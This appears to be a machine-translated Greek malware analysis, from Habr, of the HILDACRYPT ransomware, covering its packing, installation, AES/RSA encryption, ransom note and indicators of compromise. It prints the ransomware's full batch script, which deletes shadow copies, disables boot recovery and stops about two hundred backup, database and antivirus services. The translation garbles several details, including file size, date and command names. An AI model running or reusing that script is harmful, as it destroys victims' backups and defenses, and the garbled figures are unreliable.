Γεια σου, Χαμπρ! Για άλλη μια φορά, μιλάμε για τις τελευταίες εκδόσεις κακόβουλου λογισμικού από την κατηγορία Ransomware. Το HILDACRYPT είναι ένα νέο ransomware, μέλος της οικογένειας Hilda που ανακαλύφθηκε τον Αύγουστο του 2019 και πήρε το όνομά του από το καρτούν του Netflix που χρησιμοποιήθηκε για τη διανομή του λογισμικού. Σήμερα εξοικειωνόμαστε με τα τεχνικά χαρακτηριστικά αυτού του ενημερωμένου ιού ransomware.
Στην πρώτη έκδοση του ransomware Hilda, ένας σύνδεσμος προς ένα δημοσιεύτηκε στο Youtube
Στατική Ανάλυση
Το ransomware περιέχεται σε ένα αρχείο PE32 .NET γραμμένο για MS Windows. Το μέγεθός του είναι 135 byte. Τόσο ο κύριος κώδικας προγράμματος όσο και ο κωδικός προγράμματος αμυντικού είναι γραμμένοι σε C#. Σύμφωνα με την ημερομηνία και τη χρονική σφραγίδα συλλογής, το δυαδικό αρχείο δημιουργήθηκε στις 168 Σεπτεμβρίου 14.
Σύμφωνα με το Detect It Easy, το ransomware αρχειοθετείται χρησιμοποιώντας το Confuser και το ConfuserEx, αλλά αυτά τα σκιαγραφικά είναι τα ίδια με πριν, μόνο το ConfuserEx είναι ο διάδοχος του Confuser, επομένως οι υπογραφές κώδικα είναι παρόμοιες.
Το HILDACRYPT είναι πράγματι συσκευασμένο με ConfuserEx.
SHA-256: 7b0dcc7645642c141deb03377b451d3f873724c254797e3578ef8445a38ece8a
Διάνυσμα επίθεσης
Πιθανότατα, το ransomware ανακαλύφθηκε σε έναν από τους ιστότοπους προγραμματισμού Ιστού, μεταμφιεσμένος ως νόμιμο πρόγραμμα XAMPP.
Ολόκληρη η αλυσίδα της μόλυνσης φαίνεται στο
Συσκότιση
Οι συμβολοσειρές ransomware αποθηκεύονται σε κρυπτογραφημένη μορφή. Κατά την εκκίνηση, το HILDACRYPT τα αποκρυπτογραφεί χρησιμοποιώντας το Base64 και το AES-256-CBC.
Εγκατάσταση
Πρώτα απ 'όλα, το ransomware δημιουργεί έναν φάκελο στο %AppDataRoaming% στον οποίο δημιουργείται τυχαία η παράμετρος GUID (Globally Unique Identifier). Προσθέτοντας ένα αρχείο bat σε αυτήν την τοποθεσία, ο ιός ransomware το εκκινεί χρησιμοποιώντας το cmd.exe:
cmd.exe /c JKfgkgj3hjgfhjka.bat & έξοδος
Στη συνέχεια, ξεκινά να εκτελεί ένα σενάριο δέσμης για να απενεργοποιήσει τις δυνατότητες ή τις υπηρεσίες του συστήματος.
Το σενάριο περιέχει μια μακρά λίστα εντολών που καταστρέφουν σκιώδη αντίγραφα, απενεργοποιούν τον διακομιστή SQL, λύσεις δημιουργίας αντιγράφων ασφαλείας και προστασίας από ιούς.
Για παράδειγμα, προσπαθεί ανεπιτυχώς να σταματήσει τις υπηρεσίες Acronis Backup. Επιπλέον, επιτίθεται σε συστήματα αντιγράφων ασφαλείας και λύσεις προστασίας από ιούς από τους ακόλουθους προμηθευτές: Veeam, Sophos, Kaspersky, McAfee και άλλους.
@echo off
:: Not really a fan of ponies, cartoon girls are better, don't you think?
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB
vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded
vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB
vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded
vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB
vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
bcdedit /set {default} recoveryenabled No
bcdedit /set {default} bootstatuspolicy ignoreallfailures
vssadmin Delete Shadows /all /quiet
net stop SQLAgent$SYSTEM_BGC /y
net stop “Sophos Device Control Service” /y
net stop macmnsvc /y
net stop SQLAgent$ECWDB2 /y
net stop “Zoolz 2 Service” /y
net stop McTaskManager /y
net stop “Sophos AutoUpdate Service” /y
net stop “Sophos System Protection Service” /y
net stop EraserSvc11710 /y
net stop PDVFSService /y
net stop SQLAgent$PROFXENGAGEMENT /y
net stop SAVService /y
net stop MSSQLFDLauncher$TPSAMA /y
net stop EPSecurityService /y
net stop SQLAgent$SOPHOS /y
net stop “Symantec System Recovery” /y
net stop Antivirus /y
net stop SstpSvc /y
net stop MSOLAP$SQL_2008 /y
net stop TrueKeyServiceHelper /y
net stop sacsvr /y
net stop VeeamNFSSvc /y
net stop FA_Scheduler /y
net stop SAVAdminService /y
net stop EPUpdateService /y
net stop VeeamTransportSvc /y
net stop “Sophos Health Service” /y
net stop bedbg /y
net stop MSSQLSERVER /y
net stop KAVFS /y
net stop Smcinst /y
net stop MSSQLServerADHelper100 /y
net stop TmCCSF /y
net stop wbengine /y
net stop SQLWriter /y
net stop MSSQLFDLauncher$TPS /y
net stop SmcService /y
net stop ReportServer$TPSAMA /y
net stop swi_update /y
net stop AcrSch2Svc /y
net stop MSSQL$SYSTEM_BGC /y
net stop VeeamBrokerSvc /y
net stop MSSQLFDLauncher$PROFXENGAGEMENT /y
net stop VeeamDeploymentService /y
net stop SQLAgent$TPS /y
net stop DCAgent /y
net stop “Sophos Message Router” /y
net stop MSSQLFDLauncher$SBSMONITORING /y
net stop wbengine /y
net stop MySQL80 /y
net stop MSOLAP$SYSTEM_BGC /y
net stop ReportServer$TPS /y
net stop MSSQL$ECWDB2 /y
net stop SntpService /y
net stop SQLSERVERAGENT /y
net stop BackupExecManagementService /y
net stop SMTPSvc /y
net stop mfefire /y
net stop BackupExecRPCService /y
net stop MSSQL$VEEAMSQL2008R2 /y
net stop klnagent /y
net stop MSExchangeSA /y
net stop MSSQLServerADHelper /y
net stop SQLTELEMETRY /y
net stop “Sophos Clean Service” /y
net stop swi_update_64 /y
net stop “Sophos Web Control Service” /y
net stop EhttpSrv /y
net stop POP3Svc /y
net stop MSOLAP$TPSAMA /y
net stop McAfeeEngineService /y
net stop “Veeam Backup Catalog Data Service” /
net stop MSSQL$SBSMONITORING /y
net stop ReportServer$SYSTEM_BGC /y
net stop AcronisAgent /y
net stop KAVFSGT /y
net stop BackupExecDeviceMediaService /y
net stop MySQL57 /y
net stop McAfeeFrameworkMcAfeeFramework /y
net stop TrueKey /y
net stop VeeamMountSvc /y
net stop MsDtsServer110 /y
net stop SQLAgent$BKUPEXEC /y
net stop UI0Detect /y
net stop ReportServer /y
net stop SQLTELEMETRY$ECWDB2 /y
net stop MSSQLFDLauncher$SYSTEM_BGC /y
net stop MSSQL$BKUPEXEC /y
net stop SQLAgent$PRACTTICEBGC /y
net stop MSExchangeSRS /y
net stop SQLAgent$VEEAMSQL2008R2 /y
net stop McShield /y
net stop SepMasterService /y
net stop “Sophos MCS Client” /y
net stop VeeamCatalogSvc /y
net stop SQLAgent$SHAREPOINT /y
net stop NetMsmqActivator /y
net stop kavfsslp /y
net stop tmlisten /y
net stop ShMonitor /y
net stop MsDtsServer /y
net stop SQLAgent$SQL_2008 /y
net stop SDRSVC /y
net stop IISAdmin /y
net stop SQLAgent$PRACTTICEMGT /y
net stop BackupExecJobEngine /y
net stop SQLAgent$VEEAMSQL2008R2 /y
net stop BackupExecAgentBrowser /y
net stop VeeamHvIntegrationSvc /y
net stop masvc /y
net stop W3Svc /y
net stop “SQLsafe Backup Service” /y
net stop SQLAgent$CXDB /y
net stop SQLBrowser /y
net stop MSSQLFDLauncher$SQL_2008 /y
net stop VeeamBackupSvc /y
net stop “Sophos Safestore Service” /y
net stop svcGenericHost /y
net stop ntrtscan /y
net stop SQLAgent$VEEAMSQL2012 /y
net stop MSExchangeMGMT /y
net stop SamSs /y
net stop MSExchangeES /y
net stop MBAMService /y
net stop EsgShKernel /y
net stop ESHASRV /y
net stop MSSQL$TPSAMA /y
net stop SQLAgent$CITRIX_METAFRAME /y
net stop VeeamCloudSvc /y
net stop “Sophos File Scanner Service” /y
net stop “Sophos Agent” /y
net stop MBEndpointAgent /y
net stop swi_service /y
net stop MSSQL$PRACTICEMGT /y
net stop SQLAgent$TPSAMA /y
net stop McAfeeFramework /y
net stop “Enterprise Client Service” /y
net stop SQLAgent$SBSMONITORING /y
net stop MSSQL$VEEAMSQL2012 /y
net stop swi_filter /y
net stop SQLSafeOLRService /y
net stop BackupExecVSSProvider /y
net stop VeeamEnterpriseManagerSvc /y
net stop SQLAgent$SQLEXPRESS /y
net stop OracleClientCache80 /y
net stop MSSQL$PROFXENGAGEMENT /y
net stop IMAP4Svc /y
net stop ARSM /y
net stop MSExchangeIS /y
net stop AVP /y
net stop MSSQLFDLauncher /y
net stop MSExchangeMTA /y
net stop TrueKeyScheduler /y
net stop MSSQL$SOPHOS /y
net stop “SQL Backups” /y
net stop MSSQL$TPS /y
net stop mfemms /y
net stop MsDtsServer100 /y
net stop MSSQL$SHAREPOINT /y
net stop WRSVC /y
net stop mfevtp /y
net stop msftesql$PROD /y
net stop mozyprobackup /y
net stop MSSQL$SQL_2008 /y
net stop SNAC /y
net stop ReportServer$SQL_2008 /y
net stop BackupExecAgentAccelerator /y
net stop MSSQL$SQLEXPRESS /y
net stop MSSQL$PRACTTICEBGC /y
net stop VeeamRESTSvc /y
net stop sophossps /y
net stop ekrn /y
net stop MMS /y
net stop “Sophos MCS Agent” /y
net stop RESvc /y
net stop “Acronis VSS Provider” /y
net stop MSSQL$VEEAMSQL2008R2 /y
net stop MSSQLFDLauncher$SHAREPOINT /y
net stop “SQLsafe Filter Service” /y
net stop MSSQL$PROD /y
net stop SQLAgent$PROD /y
net stop MSOLAP$TPS /y
net stop VeeamDeploySvc /y
net stop MSSQLServerOLAPService /y
del %0
Μόλις απενεργοποιηθούν οι υπηρεσίες και οι διαδικασίες που αναφέρονται παραπάνω, το cryptolocker συλλέγει πληροφορίες σχετικά με όλες τις διεργασίες που εκτελούνται χρησιμοποιώντας την εντολή tasklist για να διασφαλίσει ότι όλες οι απαραίτητες υπηρεσίες είναι απενεργοποιημένες.
λίστα εργασιών v/fo csv
Αυτή η εντολή εμφανίζει μια λεπτομερή λίστα διεργασιών που εκτελούνται, τα στοιχεία των οποίων διαχωρίζονται με το σύμβολο ",".
««csrss.exe»,«448»,«services»,«0»,«1�896 ��»,«unknown»,»�/�»,«0:00:03»,»�/�»»
Μετά από αυτόν τον έλεγχο, το ransomware ξεκινά τη διαδικασία κρυπτογράφησης.
Κρυπτογράφηση
Κρυπτογράφηση αρχείων
Το HILDACRYPT περνά από όλα τα περιεχόμενα των σκληρών δίσκων που βρέθηκαν, εκτός από τους φακέλους Recycle.Bin και Reference AssembliesMicrosoft. Το τελευταίο περιέχει κρίσιμα αρχεία dll, pdb κ.λπ. για εφαρμογές .Net που μπορούν να επηρεάσουν τη λειτουργία του ransomware. Για την αναζήτηση αρχείων που θα είναι κρυπτογραφημένα, χρησιμοποιείται η ακόλουθη λίστα επεκτάσεων:
«.vb:.asmx:.config:.3dm:.3ds:.3fr:.3g2:.3gp:.3pr:.7z:.ab4:.accdb:.accde:.accdr:.accdt:.ach:.acr:.act:.adb:.ads:.agdl:.ai:.ait:.al:.apj:.arw:.asf:.asm:.asp:.aspx:.asx:.avi:.awg:.back:.backup:.backupdb:.bak:.lua:.m:.m4v:.max:.mdb:.mdc:.mdf:.mef:.mfw:.mmw:.moneywell:.mos:.mov:.mp3:.mp4:.mpg:.mpeg:.mrw:.msg:.myd:.nd:.ndd:.nef:.nk2:.nop:.nrw:.ns2:.ns3:.ns4:.nsd:.nsf:.nsg:.nsh:.nwb:.nx2:.nxl:.nyf:.tif:.tlg:.txt:.vob:.wallet:.war:.wav:.wb2:.wmv:.wpd:.wps:.x11:.x3f:.xis:.xla:.xlam:.xlk:.xlm:.xlr:.xls:.xlsb:.xlsm:.xlsx:.xlt:.xltm:.xltx:.xlw:.xml:.ycbcra:.yuv:.zip:.sqlite:.sqlite3:.sqlitedb:.sr2:.srf:.srt:.srw:.st4:.st5:.st6:.st7:.st8:.std:.sti:.stw:.stx:.svg:.swf:.sxc:.sxd:.sxg:.sxi:.sxm:.sxw:.tex:.tga:.thm:.tib:.py:.qba:.qbb:.qbm:.qbr:.qbw:.qbx:.qby:.r3d:.raf:.rar:.rat:.raw:.rdb:.rm:.rtf:.rw2:.rwl:.rwz:.s3db:.sas7bdat:.say:.sd0:.sda:.sdf:.sldm:.sldx:.sql:.pdd:.pdf:.pef:.pem:.pfx:.php:.php5:.phtml:.pl:.plc:.png:.pot:.potm:.potx:.ppam:.pps:.ppsm:.ppsx:.ppt:.pptm:.pptx:.prf:.ps:.psafe3:.psd:.pspimage:.pst:.ptx:.oab:.obj:.odb:.odc:.odf:.odg:.odm:.odp:.ods:.odt:.oil:.orf:.ost:.otg:.oth:.otp:.ots:.ott:.p12:.p7b:.p7c:.pab:.pages:.pas:.pat:.pbl:.pcd:.pct:.pdb:.gray:.grey:.gry:.h:.hbk:.hpp:.htm:.html:.ibank:.ibd:.ibz:.idx:.iif:.iiq:.incpas:.indd:.jar:.java:.jpe:.jpeg:.jpg:.jsp:.kbx:.kc2:.kdbx:.kdc:.key:.kpdx:.doc:.docm:.docx:.dot:.dotm:.dotx:.drf:.drw:.dtd:.dwg:.dxb:.dxf:.dxg:.eml:.eps:.erbsql:.erf:.exf:.fdb:.ffd:.fff:.fh:.fhd:.fla:.flac:.flv:.fmb:.fpx:.fxg:.cpp:.cr2:.craw:.crt:.crw:.cs:.csh:.csl:.csv:.dac:.bank:.bay:.bdb:.bgt:.bik:.bkf:.bkp:.blend:.bpw:.c:.cdf:.cdr:.cdr3:.cdr4:.cdr5:.cdr6:.cdrw:.cdx:.ce1:.ce2:.cer:.cfp:.cgm:.cib:.class:.cls:.cmt:.cpi:.ddoc:.ddrw:.dds:.der:.des:.design:.dgc:.djvu:.dng:.db:.db-journal:.db3:.dcr:.dcs:.ddd:.dbf:.dbx:.dc2:.pbl:.csproj:.sln:.vbproj:.mdb:.md»
Το ransomware χρησιμοποιεί τον αλγόριθμο AES-256-CBC για την κρυπτογράφηση των αρχείων χρήστη. Το μέγεθος του κλειδιού είναι 256 bit και το μέγεθος του διανύσματος προετοιμασίας (IV) είναι 16 byte.
Στο παρακάτω στιγμιότυπο οθόνης, οι τιμές των byte_2 και byte_1 ελήφθησαν τυχαία χρησιμοποιώντας το GetBytes().
Κλειδί
ΣΕ ΚΑΙ
Το κρυπτογραφημένο αρχείο έχει την επέκταση HCY!.. Αυτό είναι ένα παράδειγμα κρυπτογραφημένου αρχείου. Το κλειδί και το IV που αναφέρονται παραπάνω δημιουργήθηκαν για αυτό το αρχείο.
Κρυπτογράφηση κλειδιού
Το cryptlocker αποθηκεύει το κλειδί AES που δημιουργήθηκε σε ένα κρυπτογραφημένο αρχείο. Το πρώτο μέρος του κρυπτογραφημένου αρχείου έχει μια κεφαλίδα που περιέχει δεδομένα όπως HILDACRYPT, KEY, IV, FileLen σε μορφή XML και μοιάζει με αυτό:
Η κρυπτογράφηση κλειδιών AES και IV πραγματοποιείται με χρήση RSA-2048 και η κωδικοποίηση γίνεται χρησιμοποιώντας το Base64. Το δημόσιο κλειδί RSA αποθηκεύεται στο σώμα του cryptolocker σε μία από τις κρυπτογραφημένες συμβολοσειρές σε μορφή XML.
28guEbzkzciKg3N/ExUq8jGcshuMSCmoFsh/3LoMyWzPrnfHGhrgotuY/cs+eSGABQ+rs1B+MMWOWvqWdVpBxUgzgsgOgcJt7P+r4bWhfccYeKDi7PGRtZuTv+XpmG+m+u/JgerBM1Fi49+0vUMuEw5a1sZ408CvFapojDkMT0P5cJGYLSiVFud8reV7ZtwcCaGf88rt8DAUt2iSZQix0aw8PpnCH5/74WE8dAHKLF3sYmR7yFWAdCJRovzdx8/qfjMtZ41sIIIEyajVKfA18OT72/UBME2gsAM/BGii2hgLXP5ZGKPgQEf7Zpic1fReZcpJonhNZzXztGCSLfa/jQ==AQAB
Ένα δημόσιο κλειδί RSA χρησιμοποιείται για την κρυπτογράφηση του κλειδιού αρχείου AES. Το δημόσιο κλειδί RSA έχει κωδικοποίηση Base64 και αποτελείται από ένα συντελεστή και έναν δημόσιο εκθέτη 65537. Η αποκρυπτογράφηση απαιτεί το ιδιωτικό κλειδί RSA, το οποίο έχει ο εισβολέας.
Μετά την κρυπτογράφηση RSA, το κλειδί AES κωδικοποιείται χρησιμοποιώντας το Base64 που είναι αποθηκευμένο στο κρυπτογραφημένο αρχείο.
Μήνυμα λύτρων
Μόλις ολοκληρωθεί η κρυπτογράφηση, το HILDACRYPT εγγράφει το αρχείο html στο φάκελο στον οποίο κρυπτογραφούσε τα αρχεία. Η ειδοποίηση ransomware περιέχει δύο διευθύνσεις email όπου το θύμα μπορεί να επικοινωνήσει με τον εισβολέα.
Η ειδοποίηση εκβιασμού περιέχει επίσης τη γραμμή "No loli is safe;)" - μια αναφορά σε χαρακτήρες anime και manga με την εμφάνιση μικρών κοριτσιών που απαγορεύονται στην Ιαπωνία.
Παραγωγή
Το HILDACRYPT, μια νέα οικογένεια ransomware, κυκλοφόρησε μια νέα έκδοση. Το μοντέλο κρυπτογράφησης εμποδίζει το θύμα να αποκρυπτογραφήσει αρχεία που είναι κρυπτογραφημένα από το ransomware. Το Cryptolocker χρησιμοποιεί μεθόδους ενεργής προστασίας για να απενεργοποιήσει τις υπηρεσίες προστασίας που σχετίζονται με συστήματα δημιουργίας αντιγράφων ασφαλείας και λύσεις προστασίας από ιούς. Ο συγγραφέας του HILDACRYPT είναι θαυμαστής της σειράς κινουμένων σχεδίων Hilda που προβάλλεται στο Netflix, ο σύνδεσμος για το τρέιλερ της οποίας περιείχε η επιστολή εξαγοράς για την προηγούμενη έκδοση του προγράμματος.
Κανονικά,
Δείκτες συμβιβασμού
Επέκταση αρχείου HCY!
HILDACRYPTReadMe.html
xamp.exe με ένα γράμμα "p" και χωρίς ψηφιακή υπογραφή
SHA-256: 7b0dcc7645642c141deb03377b451d3f873724c254797e3578ef8445a38ece8a
Πηγή: www.habr.com